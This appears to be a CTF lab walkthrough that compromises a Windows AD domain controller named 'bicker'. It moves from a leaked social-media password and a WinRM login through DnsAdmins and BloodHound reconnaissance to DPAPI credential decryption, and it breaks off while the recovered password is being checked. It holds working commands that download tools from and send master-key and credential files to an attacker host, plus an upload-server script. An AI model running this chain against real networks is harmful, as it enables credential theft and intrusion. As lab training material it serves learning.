MazeSec-bicker-Walkthrough
城南花已开

Information gathering

Service discovery

export ip=192.168.60.128
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.128:53
Open 192.168.60.128:88
Open 192.168.60.128:135
Open 192.168.60.128:139
Open 192.168.60.128:389
Open 192.168.60.128:445
Open 192.168.60.128:464
Open 192.168.60.128:593
Open 192.168.60.128:3268
Open 192.168.60.128:3389
Open 192.168.60.128:5985
Open 192.168.60.128:9389
Open 192.168.60.128:49664
Open 192.168.60.128:49669
Open 192.168.60.128:51774
Open 192.168.60.128:51775
Open 192.168.60.128:51792
Open 192.168.60.128:57684
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 14:05 CST
Initiating ARP Ping Scan at 14:05
Scanning 192.168.60.128 [1 port]
Completed ARP Ping Scan at 14:05, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:05
Completed Parallel DNS resolution of 1 host. at 14:05, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:05
Scanning 192.168.60.128 [18 ports]
Discovered open port 135/tcp on 192.168.60.128
Discovered open port 3389/tcp on 192.168.60.128
Discovered open port 53/tcp on 192.168.60.128
Discovered open port 445/tcp on 192.168.60.128
Discovered open port 57684/tcp on 192.168.60.128
Discovered open port 139/tcp on 192.168.60.128
Discovered open port 49664/tcp on 192.168.60.128
Discovered open port 389/tcp on 192.168.60.128
Discovered open port 51774/tcp on 192.168.60.128
Discovered open port 9389/tcp on 192.168.60.128
Discovered open port 3268/tcp on 192.168.60.128
Discovered open port 5985/tcp on 192.168.60.128
Discovered open port 88/tcp on 192.168.60.128
Discovered open port 593/tcp on 192.168.60.128
Discovered open port 51775/tcp on 192.168.60.128
Discovered open port 51792/tcp on 192.168.60.128
Discovered open port 49669/tcp on 192.168.60.128
Discovered open port 464/tcp on 192.168.60.128
Completed SYN Stealth Scan at 14:05, 0.02s elapsed (18 total ports)
Nmap scan report for 192.168.60.128
Host is up, received arp-response (0.00088s latency).
Scanned at 2025-08-26 14:05:33 CST for 0s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 128
88/tcp open kerberos-sec syn-ack ttl 128
135/tcp open msrpc syn-ack ttl 128
139/tcp open netbios-ssn syn-ack ttl 128
389/tcp open ldap syn-ack ttl 128
445/tcp open microsoft-ds syn-ack ttl 128
464/tcp open kpasswd5 syn-ack ttl 128
593/tcp open http-rpc-epmap syn-ack ttl 128
3268/tcp open globalcatLDAP syn-ack ttl 128
3389/tcp open ms-wbt-server syn-ack ttl 128
5985/tcp open wsman syn-ack ttl 128
9389/tcp open adws syn-ack ttl 128
49664/tcp open unknown syn-ack ttl 128
49669/tcp open unknown syn-ack ttl 128
51774/tcp open unknown syn-ack ttl 128
51775/tcp open unknown syn-ack ttl 128
51792/tcp open unknown syn-ack ttl 128
57684/tcp open unknown syn-ack ttl 128
MAC Address: 00:0C:29:D4:9B:A5 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Raw packets sent: 19 (820B) | Rcvd: 19 (820B)

No web service is exposed, but SMB and LDAP are present, the services typical of an AD domain environment.

Credential leak

Check whether the guest/anonymous user can read files over SMB

❯ nxc smb $ip -u guest -p "" --shares
SMB 192.168.60.128 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB 192.168.60.128 445 DC [+] bicker.com\guest:
SMB 192.168.60.128 445 DC [*] Enumerated shares
SMB 192.168.60.128 445 DC Share Permissions Remark
SMB 192.168.60.128 445 DC ----- ----------- ------
SMB 192.168.60.128 445 DC ADMIN$ 远程管理
SMB 192.168.60.128 445 DC C$ 默认共享
SMB 192.168.60.128 445 DC IPC$ READ 远程 IPC
SMB 192.168.60.128 445 DC NETLOGON Logon server share
SMB 192.168.60.128 445 DC puppy READ
SMB 192.168.60.128 445 DC SYSVOL Logon server share

The puppy share is readable, so try downloading the image stored in it

❯ smbclient  -U guest //$ip/puppy
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Aug 15 12:06:51 2025
.. DHS 0 Fri Aug 15 17:20:46 2025
puppy.jpg A 57634 Fri Aug 15 12:06:51 2025

12923135 blocks of size 4096. 9336716 blocks available
smb: \> get puppy.jpg
getting file \puppy.jpg of size 57634 as puppy.jpg (3310.8 KiloBytes/sec) (average 3310.8 KiloBytes/sec)
smb: \> exit

image

Check whether the image hides anything (steganography or embedded data)

The Artist field turns out to contain a uid value

❯ file puppy.jpg
puppy.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 1200x1200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, description=bilibili, orientation=upper-left, software=Google], baseline, precision 8, 620x381, components 3
❯ exiftool puppy.jpg
ExifTool Version Number : 13.10
File Name : puppy.jpg
Directory : .
File Size : 58 kB
File Modification Date/Time : 2025:08:26 15:10:33+08:00
File Access Date/Time : 2025:08:26 15:10:51+08:00
File Inode Change Date/Time : 2025:08:26 15:10:33+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 1200
Y Resolution : 1200
Exif Byte Order : Little-endian (Intel, II)
Image Description : bilibili
Orientation : Horizontal (normal)
Software : Google
Artist : uid=3546958956333518
Exif Version : 0220
Exif Image Width : 620
Exif Image Height : 381
Image Width : 620
Image Height : 381
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 620x381
Megapixels : 0.236

The uid is clearly a bilibili user id, so look it up directly

image

Hilarious 🤣: the user's feed has a pinned post that leaks the credentials tindalos:Th3C@ll0fCtHu1hu!

image

Verify that the credentials work

❯ netexec ldap $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!'
LDAP 192.168.60.128 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP 192.168.60.128 389 DC [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
❯ netexec smb $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!'
SMB 192.168.60.128 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:bicker.com) (signing:True) (SMBv1:False)
SMB 192.168.60.128 445 DC [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
❯ netexec winrm $ip -u tindalos -p Th3C@ll0fCtHu1hu!
WINRM 192.168.60.128 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
WINRM 192.168.60.128 5985 DC [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu! (Pwn3d!)

Getting user

These credentials allow a direct remote login over WinRM

❯ evil-winrm -i $ip -u 'tindalos' -p 'Th3C@ll0fCtHu1hu!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami
bicker\tindalos
*Evil-WinRM* PS C:\Users\tindalos\Documents> gci ../Desktop


目录: C:\Users\tindalos\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/15/2025 6:35 PM 26 user.txt


*Evil-WinRM* PS C:\Users\tindalos\Documents> gc ../Desktop/user.txt
user{f3a9d2b1c4e87a5f6d9b}

WinRM (Windows Remote Management) is Microsoft's implementation of the WS-Management protocol; it lets remote management of a computer be carried over HTTP or HTTPS.

By default, WinRM uses the following ports:

  • HTTP (unencrypted): 5985
  • HTTPS (encrypted): 5986

Check the user's privileges

*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami /priv

特权信息
----------------------

特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用

Upload winpeas.bat and run it

For some reason certutil could not download it 😅, and it was dead on arrival anyway: Windows Defender quarantined it

*Evil-WinRM* PS C:\Users\tindalos\Documents> certutil -urlcache -split -f http://192.168.60.100/winPEAS.bat C:\Users\tindalos\Documents\winpeas.bat
Program 'certutil.exe' failed to run: 拒绝访问。At line:1 char:1
+ certutil -urlcache -split -f http://192.168.60.100/winpeas.bat C:\Use ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ certutil -urlcache -split -f http://192.168.60.100/winpeas.bat C:\Use ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\tindalos\Documents> Invoke-WebRequest -Uri http://192.168.60.100/winPEAS.bat -OutFile "C:\Users\tindalos\Documents\winpeas.bat"
*Evil-WinRM* PS C:\Users\tindalos\Documents> gci


目录: C:\Users\tindalos\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/26/2025 4:21 PM 36950 winpeas.bat

PS C:\Users\tindalos\Documents> .\winpeas.bat
Program 'winpeas.bat' failed to run: 无法成功完成操作,因为文件包含病毒或潜在的垃圾软件。At line:1 char:1
+ .\winpeas.bat
+ ~~~~~~~~~~~~~.
At line:1 char:1
+ .\winpeas.bat
+ ~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

DnsAdmins privilege escalation

Check group membership

tindalos turns out to be a member of the DnsAdmins group, which is unusual

*Evil-WinRM* PS C:\Users\tindalos\Documents> whoami /groups

组信息
-----------------

组名 类型 SID 属性
=========================================== ====== ============================================ ======================================
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Desktop Users 别名 S-1-5-32-555 必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users 别名 S-1-5-32-580 必需的组, 启用于默认, 启用的组
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
BUILTIN\Pre-Windows 2000 Compatible Access 别名 S-1-5-32-554 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK 已知组 S-1-5-2 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
BICKER\DnsAdmins 别名 S-1-5-21-298176814-2846777796-698167141-1101 必需的组, 启用于默认, 启用的组, 本地组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Plus Mandatory Level 标签 S-1-16-8448

Microsoft's own documentation flags the DnsAdmins group as insecure, so privilege escalation through it is worth a try

Security assessment: Insecure permissions of the DnsAdmins group - Microsoft Defender for Identity | Microsoft Learn

Implementing Least-Privilege Administrative Models | Microsoft Learn

image

The parameters of the dnscmd command are documented in the official docs: Dnscmd | Microsoft Learn

According to articles online, a malicious DLL can be generated and registered as a new plugin location; after the DNS service is restarted it loads that DLL, which yields SYSTEM privileges

However, the current user cannot restart the DNS service, and cannot even query its status

*Evil-WinRM* PS C:\Users\tindalos\Documents> stsv dns
The term 'stsv' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ stsv dns
+ ~~~~
+ CategoryInfo : ObjectNotFound: (stsv:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\tindalos\Documents> gsv dns
Cannot find any service with service name 'dns'.
At line:1 char:1
+ gsv dns
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (dns:String) [Get-Service], ServiceCommandException
+ FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

By default, members of the DnsAdmins group cannot directly restart the DNS service (they are blocked from doing so).

The DnsAdmins group's permissions focus on configuring and managing the DNS service itself, for example:

  • Creating, modifying and deleting DNS zones
  • Adding, modifying and deleting DNS records
  • Configuring forwarders and root hints
  • Managing DNS security settings (such as secure dynamic updates)
  • Viewing DNS service status and logs

So we need a user who holds the right to restart the DNS service

Try collecting BloodHound data from the DC with netexec

❯ netexec ldap $ip -u tindalos -p 'Th3C@ll0fCtHu1hu!' --bloodhound -c All -d bicker.com --dns-server $ip
LDAP 192.168.60.128 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP 192.168.60.128 389 DC [+] bicker.com\tindalos:Th3C@ll0fCtHu1hu!
LDAP 192.168.60.128 389 DC Resolved collection methods: localadmin, session, trusts, rdp, objectprops, psremote, acl, container, dcom, group
LDAP 192.168.60.128 389 DC Done in 00M 00S
LDAP 192.168.60.128 389 DC Compressing output into /home/Pepster/.nxc/logs/DC_192.168.60.128_2025-08-26_172043_bloodhound.zip

After importing the zip, a DNSRESTARTERS group shows up; as the name suggests it is a DNS-restart group. Group names are arbitrary, but its description also states that it is the group allowed to restart DNS via scheduled tasks/scripts

image

Assuming this group really does hold the DNS restart right, digging further shows that the user lihua belongs to ACCOUNTMODIFIER, a group that can force-change the password of the JIANYIN user

image

*Evil-WinRM* PS C:\Users\tindalos\Documents> net user lihua /domain
用户名 lihua
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不

上次设置密码 2025/8/15 18:24:10
密码到期 2025/9/26 18:24:10
密码可更改 2025/8/16 18:24:10
需要密码 Yes
用户可以更改密码 Yes

允许的工作站 dc
登录脚本
用户配置文件
主目录
上次登录 从不

可允许的登录小时数 All

本地组成员 *Remote Management Use
全局组成员 *Domain Users *AccountModifier
命令成功完成。

*Evil-WinRM* PS C:\Users\tindalos\Documents> net user jianyin /domain
用户名 jianyin
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不

上次设置密码 2025/8/15 9:05:36
密码到期 2025/9/26 9:05:36
密码可更改 2025/8/16 9:05:36
需要密码 Yes
用户可以更改密码 Yes

允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不

可允许的登录小时数 All

本地组成员 *Remote Management Use
全局组成员 *Domain Users *DNSRestarters
命令成功完成。

DPAPI decryption

Recovering Windows credentials via DPAPI | 长亭百川云

Try decrypting DPAPI to recover the saved credential history

The guess is that lihua's credentials were saved at some point; since we already know tindalos's plaintext password, we can decrypt his DPAPI master key

In a domain environment the master keys are usually located under %APPDATA%\Roaming\Microsoft\Protect\<User_SID>, i.e. as part of the roaming profile, while the Local folder holds credentials saved for this machine only

This gives the SID S-1-5-21-298176814-2846777796-698167141-1103

and the credential file A2E4656BCBABFD9279E090E8482A7141

Note that the files under the Credentials path are hidden by default, so you need ls -force or gci -hidden to see them

*Evil-WinRM* PS C:\Users\tindalos\Documents> gci C:\Users\tindalos\AppData\Roaming\Microsoft\Protect


目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Protect


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 8/15/2025 6:11 PM S-1-5-21-298176814-2846777796-698167141-1103

*Evil-WinRM* PS C:\Users\tindalos\Documents> gci -hidden C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials


目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 8/15/2025 6:26 PM 326 A2E4656BCBABFD9279E090E8482A7141

DPAPI (Data Protection Application Programming Interface) is a data protection mechanism provided by Windows for encrypting sensitive data so that it can only be decrypted by the user or machine that encrypted it. Its main advantage is that applications do not have to manage encryption keys themselves and instead rely on the secure storage Windows provides.

The master key can be unlocked with one of the following:

  1. A value derived from the user's password hash (user-level DPAPI): if an attacker knows the user's plaintext password or NT hash, the key used to decrypt the master key can be regenerated.
  2. The machine account's key (domain- and machine-level DPAPI): requires access to the machine account key, which is normally stored in the Active Directory database (NTDS.DIT) on the domain controller, or obtained from memory with Mimikatz.

DPAPI master key
  • Example path: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>
  • Stored content: the user's DPAPI master key files. These keys are themselves encrypted with a key derived from the user's logon credential (password hash).
  • Decryption key: the user's plaintext password or NT hash (used to decrypt the master key file).

Encrypted credentials
  • Example path: C:\Users\<user>\AppData\Local\Microsoft\Credentials\
  • Stored content: the actual encrypted credential data (passwords saved by Windows Credential Manager, cached domain passwords, web credentials, etc.), encrypted with the DPAPI master key.
  • Decryption key: the matching DPAPI master key (already decrypted). Once the master key is decrypted, these credentials can be decrypted.
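As an added example (not from the post, and not impacket's code), here is a parser for the master key file format that impacket dumps further down: it checks the four section lengths against the file size (the post's file is 740 bytes: a 128-byte header plus 136 + 104 + 0 + 372), reads the PBKDF2 parameters protecting the key, and computes the per-user key that impacket labels "User Key (MD4 protected)". The field order follows the mimikatz/impacket MasterKeyFile and MasterKey structures (an assumption about layout, both policy/flags words are 0 in the post's file), and the sample file is constructed here with zero-filled key material.

```python
import hashlib
import hmac
import struct

# Header of a DPAPI master key file (mimikatz/impacket MasterKeyFile layout,
# assumed here): version, 2 unknown dwords, 72-byte UTF-16LE GUID, unknown dword,
# policy, flags, then four 64-bit section lengths. All little-endian, 128 bytes.
MKF_HEADER = struct.Struct("<LLL72sLLLQQQQ")
# Inner MasterKey block at the start of the first section: version, 16-byte
# salt, PBKDF2 iteration count, hash ALG_ID, cipher ALG_ID, then encrypted key.
MK_BLOCK = struct.Struct("<L16sLLL")

ALG_NAMES = {0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512",
             0x6603: "CALG_3DES", 0x6610: "CALG_AES_256"}


def parse_masterkey_file(data: bytes) -> dict:
    """Split a master key file into header fields and its four sections."""
    if len(data) < MKF_HEADER.size:
        raise ValueError("file shorter than the master key header")
    (version, _u1, _u2, guid_raw, _u3, policy, flags,
     mk_len, bk_len, ch_len, dk_len) = MKF_HEADER.unpack_from(data, 0)
    expected = MKF_HEADER.size + mk_len + bk_len + ch_len + dk_len
    if expected != len(data):
        # A truncated or tampered file: lengths no longer add up to the size.
        raise ValueError(f"sections sum to {expected} bytes, file is {len(data)}")
    guid = guid_raw.decode("utf-16le").rstrip("\x00")
    off = MKF_HEADER.size
    mk_blob = data[off:off + mk_len]
    off += mk_len + bk_len + ch_len          # skip backup key and CREDHIST
    dk_blob = data[off:off + dk_len]
    if len(mk_blob) < MK_BLOCK.size:
        raise ValueError("master key section too short")
    _mk_ver, salt, iterations, hash_alg, crypt_alg = MK_BLOCK.unpack_from(mk_blob, 0)
    return {
        "version": version, "guid": guid, "policy": policy, "flags": flags,
        "MasterKeyLen": mk_len, "BackupKeyLen": bk_len,
        "CredHistLen": ch_len, "DomainKeyLen": dk_len,
        "salt": salt, "iterations": iterations,
        "hash_alg": ALG_NAMES.get(hash_alg, hex(hash_alg)),
        "crypt_alg": ALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "encrypted_key": mk_blob[MK_BLOCK.size:],
        # A non-empty domain key section means the DC's DPAPI backup key can
        # also unlock this master key, independently of the user's password.
        "domain_backup_present": dk_len > 0,
        "domain_key_bytes": len(dk_blob),
    }


def user_key_from_nt_hash(nt_hash: bytes, sid: str) -> bytes:
    """The 'User Key (MD4 protected)' impacket reports for domain users:
    HMAC-SHA1 keyed with the NT hash over the UTF-16LE SID plus a NUL.
    This secret feeds PBKDF2 with the salt/iterations above, which is why
    a plaintext password or NT hash plus the SID is all an attacker needs."""
    return hmac.new(nt_hash, (sid + "\0").encode("utf-16le"), hashlib.sha1).digest()


def build_sample_file(guid: str, mk_len=136, bk_len=104, ch_len=0, dk_len=372) -> bytes:
    """Constructed sample using the section lengths of the post's file
    (740 bytes in total); key material is zero-filled, parser exercise only."""
    header = MKF_HEADER.pack(2, 0, 0, guid.encode("utf-16le").ljust(72, b"\0"),
                             0, 0, 0, mk_len, bk_len, ch_len, dk_len)
    mk_block = MK_BLOCK.pack(2, b"\x11" * 16, 8000, 0x800E, 0x6610)
    mk_block += b"\0" * (mk_len - MK_BLOCK.size)
    return header + mk_block + b"\0" * (bk_len + ch_len + dk_len)


if __name__ == "__main__":
    sample = build_sample_file("cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74")
    info = parse_masterkey_file(sample)
    for k, v in info.items():
        if k != "encrypted_key":
            print(f"{k:22}: {v}")
```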

Enter the SID folder and decrypt the master key inside it

*Evil-WinRM* PS C:\Users\tindalos\Documents> ls -force C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103


目录: C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 8/15/2025 11:18 AM 900 BK-BICKER
-a-hs- 8/15/2025 6:11 PM 740 cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
-a-hs- 8/15/2025 6:11 PM 24 Preferred

Evil-WinRM's download has some issues, so use a Python reverse-upload script instead (the script is by wackymaker)

#!/usr/bin/env python3
# Upload from the target side with e.g.:
# curl -F "file=@/home/app/app/instance/users.db" http://10.10.16.6/
# Note: the cgi module is deprecated since Python 3.11 and removed in 3.13,
# so run this with Python 3.12 or older.
from http.server import HTTPServer, BaseHTTPRequestHandler
import cgi
import os
import io

PORT = 80
UPLOAD_DIR = "./uploads"

if not os.path.exists(UPLOAD_DIR):
    os.makedirs(UPLOAD_DIR)


class SimpleUploadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve a minimal upload form for browser use
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        html = '''
<html><body>
<h1>Upload file</h1>
<form enctype="multipart/form-data" method="post">
<input name="file" type="file"/>
<input type="submit" value="Upload"/>
</form>
</body></html>
'''
        self.wfile.write(html.encode('utf-8'))

    def do_POST(self):
        content_type = self.headers.get('content-type')
        if not content_type:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No Content-Type header")
            return

        ctype, pdict = cgi.parse_header(content_type)
        if ctype != 'multipart/form-data':
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"Content-Type is not multipart/form-data")
            return

        length = int(self.headers.get('content-length'))
        post_data = self.rfile.read(length)  # read the whole POST body

        # Wrap post_data in BytesIO so FieldStorage can read it
        post_io = io.BytesIO(post_data)

        form = cgi.FieldStorage(
            fp=post_io,
            headers=self.headers,
            environ={
                'REQUEST_METHOD': 'POST',
                'CONTENT_TYPE': content_type,
            }
        )

        if 'file' not in form:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No file field in form")
            return

        file_item = form['file']
        if not file_item.filename:
            self.send_response(400)
            self.end_headers()
            self.wfile.write(b"No filename provided")
            return

        # basename() drops any directory part, so a client cannot write outside UPLOAD_DIR
        filename = os.path.basename(file_item.filename)
        file_data = file_item.file.read()

        filepath = os.path.join(UPLOAD_DIR, filename)
        with open(filepath, 'wb') as f:
            f.write(file_data)

        self.send_response(200)
        self.end_headers()
        self.wfile.write(f"File '{filename}' uploaded successfully\n".encode())


def run():
    server_address = ('', PORT)
    httpd = HTTPServer(server_address, SimpleUploadHandler)
    print(f"Starting server on port {PORT}, saving uploads to {UPLOAD_DIR}")
    httpd.serve_forever()


if __name__ == "__main__":
    run()

Start the server and try uploading the files

❯ python3 upload_server.py
Starting server on port 80, saving uploads to ./uploads
192.168.60.128 - - [26/Aug/2025 23:58:04] "POST / HTTP/1.1" 200 -
192.168.60.128 - - [26/Aug/2025 23:59:48] "POST / HTTP/1.1" 200 -

--------------------
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc = New-Object System.Net.WebClient
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc.UploadFile("http://192.168.60.100/", "POST", "C:\Users\tindalos\AppData\Roaming\Microsoft\Protect\S-1-5-21-298176814-2846777796-698167141-1103\cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74")
*Evil-WinRM* PS C:\Users\tindalos\Documents> $wc.UploadFile("http://192.168.60.100/", "POST", "C:\Users\tindalos\AppData\Roaming\Microsoft\Credentials\A2E4656BCBABFD9279E090E8482A7141")

Try decrypting the DPAPI master key with tindalos's plaintext password

cd uploads
ls
A2E4656BCBABFD9279E090E8482A7141 cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
❯ impacket-dpapi masterkey -file cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74 -sid S-1-5-21-298176814-2846777796-698167141-1103 -password 'Th3C@ll0fCtHu1hu!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : cb5f08bd-480d-4d6e-9d2d-1d18c94fcb74
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0x0ff22e711e14912c168ec3943e2478081930413b24795f45028bf15992aebc0b5b0954128398441a4c2578c90e5c2da71bc678d8d5a4e66836e9f083e20eeb27

Then use the decrypted master key to decrypt the credential

This yields the password saved for the user lihua: hello%2633

❯ impacket-dpapi credential -file A2E4656BCBABFD9279E090E8482A7141 -key 0x0ff22e711e14912c168ec3943e2478081930413b24795f45028bf15992aebc0b5b0954128398441a4c2578c90e5c2da71bc678d8d5a4e66836e9f083e20eeb27
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-08-15 10:26:22
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=LOCALMACHINE
Description :
Unknown :
Username : lihua
Unknown : hello%2633

There is a little easter egg here: the PowerShell history was not cleared, so you can see the original password the author set, though it is of no use

*Evil-WinRM* PS C:\Users\tindalos\Documents> (Get-PSReadlineOption)


EditMode : Windows
AddToHistoryHandler : System.Func`2[System.String,System.Object]
HistoryNoDuplicates : True
HistorySavePath : C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt
HistorySaveStyle : SaveIncrementally
HistorySearchCaseSensitive : False
HistorySearchCursorMovesToEnd : False
MaximumHistoryCount : 4096
ContinuationPrompt : >>
ExtraPromptLineCount : 0
PromptText :
BellStyle : Audible
DingDuration : 50
DingTone : 1221
CommandsToValidateScriptBlockArguments : {ForEach-Object, %, Invoke-Command, icm...}
CommandValidationHandler :
CompletionQueryItems : 100
MaximumKillRingCount : 10
ShowToolTips : True
ViModeIndicator : None
WordDelimiters : ;:,.[]{}()/\|^&*-=+'"–—―
AnsiEscapeTimeout : 100
CommandColor : "$([char]0x1b)[93m"
CommentColor : "$([char]0x1b)[32m"
ContinuationPromptColor : "$([char]0x1b)[37m"
DefaultTokenColor : "$([char]0x1b)[37m"
EmphasisColor : "$([char]0x1b)[96m"
ErrorColor : "$([char]0x1b)[91m"
KeywordColor : "$([char]0x1b)[92m"
MemberColor : "$([char]0x1b)[97m"
NumberColor : "$([char]0x1b)[97m"
OperatorColor : "$([char]0x1b)[90m"
ParameterColor : "$([char]0x1b)[90m"
SelectionColor : "$([char]0x1b)[30;47m"
StringColor : "$([char]0x1b)[36m"
TypeColor : "$([char]0x1b)[37m"
VariableColor : "$([char]0x1b)[92m"



*Evil-WinRM* PS C:\Users\tindalos\Documents> ls C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Directory: C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/15/2025 6:22 PM 160 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\tindalos\Documents> cat C:\Users\tindalos\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$pass = 'fhkjds%&12'
$pass = 'fhkjds%&12'
cmd
$pass = 'fhkjds%&12'
cmd
$Cred = New-Object System.Management.Automation.PSCredential('lihua', $SecurePass)

Escalating to SYSTEM

Verify that the password works. For some reason netexec reports that WinRM login fails here, but in practice evil-winrm can log in with it

❯ netexec ldap $ip -u lihua -p 'hello%2633'
LDAP 192.168.60.128 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:bicker.com)
LDAP 192.168.60.128 389 DC [+] bicker.com\lihua:hello%2633
❯ netexec winrm $ip -u lihua -p 'hello%2633'
